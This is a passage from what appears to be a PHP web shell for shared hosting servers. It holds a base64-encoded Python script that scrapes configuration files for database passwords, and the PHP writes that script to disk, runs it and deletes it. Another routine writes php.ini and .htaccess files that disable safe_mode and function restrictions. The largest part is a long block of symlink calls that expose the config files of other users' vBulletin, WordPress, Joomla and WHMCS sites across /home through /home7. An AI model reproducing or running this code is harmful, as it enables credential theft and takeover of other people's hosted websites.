Zi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic='; $file = fopen("cp.py","w+"); $write = fwrite ($file ,base64_decode($cp)); fclose($file); chmod("cp.py",0755); $url = $_POST['url']; echo" "; system("python cp.py $url config"); unlink ('cp.py'); echo" "; echo "
<< BACK"; exit; } if($_POST['matikan']=='sekatan'){ @error_reporting(0); $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ=='; $file = fopen("php.ini","w+"); $write = fwrite ($file ,base64_decode($phpini)); fclose($file); $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ=='; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); echo "
DONE!"; echo "
BACK"; exit; } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $fn = $_POST['foldername']; //all function here function syml($usern,$pdomain) { symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); } 